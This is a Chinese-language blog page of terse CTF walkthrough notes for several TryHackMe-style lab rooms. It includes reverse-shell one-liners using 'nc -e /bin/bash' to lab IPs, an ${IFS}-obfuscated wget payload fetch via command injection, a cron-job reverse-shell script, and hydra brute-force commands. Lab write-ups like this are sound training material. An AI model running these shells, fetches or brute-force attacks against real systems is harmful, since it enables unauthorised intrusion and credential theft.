CTF collection Vol.2 什么应试机器人
不写
ConvertMyVideo 反引号命令注入 定时任务
wget${IFS}10.17.6.173/nc.sh 由于url编码以及各种原因,空格等shell符号容易发生EOF,直接内网传文件 反弹shell后查找一番 getcap -r / 2>/dev/null 没有 ps aux | grep "^root" 找root相关进程 用pspy,找到定时任务 然后cat写入文件 再弹一次shell
Dav 文件上传 webdav
默认用户名wampp:xampp cadaver上传文件
Develpy input,定时任务
input不修改输入的类型__import__('os').system('nc -e /bin/bash 10.9.0.54 4444') 直接反弹shell了 同样没有修改权限但是有删除权限,写个反弹shell 写shellprintf '#!/bin/bash\nnc -e /bin/bash 10.17.6.173 9999' > root.sh
Exposev6 sql注入,目录爆破,文件上传,LFI,suid
本地文件包含 其实感觉可以直接pear了 pear不行.测啊,没看tmp了,烦烦 find suid提权
Fowsniff CTF msf pop3
后来好像又是hydra爆破的了
Forensics 取证 volatility
操作系统vol -f victim.raw windows.infoSearchIndexer 的 PID 是什么vol -f victim.raw windows.pslist.PsList | grep Search用户最后访问的目录vol -f victim.raw windows.registry.hivelist(注册表文件)做不下去了 转 volatility2 volatility -f /dumps/victim.raw imageinfovolatility -f /dumps/victim.raw --profile=Win7SP1x64 pslistvolatility -f /dumps/victim.raw --profile=Win7SP1x64 shellbags扫端口volatility -f /dumps/victim.raw --profile=Win7SP1x64 netscan查找恶意进程volatility -f /dumps/victim.raw --profile=Win7SP1x64 malfinddump一下上面的恶意进程volatil ...
GoldenEye pop3 hydra aspell overlayfs-3.13.0-32-generic
hydra -l boris -P /path/dict pop3://10.10.208.133:55007 得到secret1! USER natalyaPASS birdRETR 1 两封邮件的内容 RETR 1+OK 631 octetsReturn-Path: <root@ubuntu>X-Original-To: natalyaDelivered-To: natalya@ubuntuReceived: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id D5EDA454B1 for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)Message-Id: <20180425024542.D5EDA454B1@ubuntu>Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)From: root@ubuntuNatalya, please you need ...
HA Joker CTF
爆破发现secret.txt 接着爆破 hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.182.148 http-get 其实我想知道的是命令为什么是这样写的 又是joomla /language/en-GB/en-GB.xml 3.7版本 wget --user=joker --password=hannah http://10.10.182.148:8080/backup.zip 备份文件拉取下了,需要密码 zip2john file hashjohn hash 密码也是hannah 数据库里有 LOCK TABLES `cc1gr_users` WRITE;/*!40000 ALTER TABLE `cc1gr_users` DISABLE KEYS */;INSERT INTO `cc1gr_users` VALUES (547,'Super Duper User','admin','admin@example.com',' ...
JVM Reverse Engineering
Jack-of-All-Trades 不知道干啥的,没什么意思
KoTH Hackers
爆破ftp,司马仔
avatar
dionysus
我醉欲眠卿且去
此心安处
公告